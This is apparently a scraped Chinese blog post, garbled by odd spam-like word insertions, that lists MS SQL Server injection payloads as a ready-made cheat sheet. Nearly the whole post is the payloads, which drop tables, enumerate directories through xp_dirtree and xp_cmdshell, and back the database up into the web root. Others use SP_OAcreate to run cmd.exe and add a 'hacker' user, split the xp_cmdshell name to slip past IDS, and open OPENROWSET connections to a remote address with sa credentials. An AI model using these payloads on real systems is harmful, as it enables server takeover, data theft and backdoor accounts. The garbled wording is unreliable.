;drop table test;–
始建查看目录的表dirs:
;create table dirs(paths varchar(100), id int)
把查看目录的剧情插电子手表dirs:
;insert dirs exec master.dbo.xp_dirtree ‘c:\’
爆目录的剧情dirs:
and 0<>(select top 1 paths from dirs)
备份数据库DATANAME:
declare @a sysname; set @a=db_name();backup DATANAME @a to
disk=’c:\inetpub\wwwroot\down.bak’;–
删除表dirs:
;drop table dirs;–
创建表temp:
;create table temp(id nvarchar(255),num1 nvarchar(255),num2
nvarchar(255),num3 nvarchar(255));–
把驱动盘列表加入temp表:
;insert temp exec master.dbo.xp_availablemedia;–
删除表temp:
;delete from temp;–
创建表dirs:
;create table dirs(paths varchar(100), id int);–
获得子目录列表XP_SUBDIRS:
;insert dirs exec master.dbo.xp_subdirs ‘c:\’;–
纸包不住火内容(显错格局):
and 0<>(select top 1 paths from dirs)
删除表dirs:
;delete from dirs;–
创建表dirs:
;create table dirs(paths varchar(100), id int)–
用XP_CMDSHELL查看目录内容:
;insert dirs exec master..xp_cmdshell ‘dir c:\’
删除表dirs:
;delete from dirs;–
检测SP_OAcreate(实践命令):
and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE name=
‘SP_OAcreate’)
SP_OAcreate执行CMD命令:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC
SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c net
user hacker 123456 /add’
SP_OAcreate建目录:
;DECLARE @shell INT EXEC SP_OAcreate ‘wscript.shell’,@shell OUTPUT EXEC
SP_OAMETHOD @shell,’run’,null, ‘C:\WINNT\system32\cmd.exe /c md
c:\inetpub\wwwroot\1111’
成立三个虚构目录E盘:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec
sp_oamethod @o, ‘run’, NULL,’ cscript.exe
c:\inetpub\wwwroot\mkwebdir.vbs -w “默认 Web 站点” -v “e”,”e:\”‘
设置设想目录E为可读:
;declare @o int exec sp_oacreate ‘wscript.shell’, @o out exec
sp_oamethod @o, ‘run’, NULL,’ cscript.exe
c:\inetpub\wwwroot\冠亚体育手机网站,chaccess.vbs -a w3svc/1/ROOT/e +browse’
启动SERVER服务:
;exec master..xp_servicecontrol ‘start’, ‘server’
绕过IDS检测XP_CMDSHELL:
;declare @a sysname set @a=’xp_’+’cmdshell’ exec @a ‘dir c:\’
开启远程数据库1:
; select * from OPENROWSET(‘SQLOLEDB’,
‘server=servername;uid=sa;pwd=apachy_123’, ‘select * from table1’ )
敞开远程数据库2:
;select * from OPENROWSET(‘SQLOLEDB’,
‘uid=sa;pwd=apachy_123;Network=DBMSSOCN;Address=202.100.100.1,1433;’,
‘select * from table’

一度起来冒汗了.

原稿地址:

Post Author: admin

发表评论

电子邮件地址不会被公开。 必填项已用*标注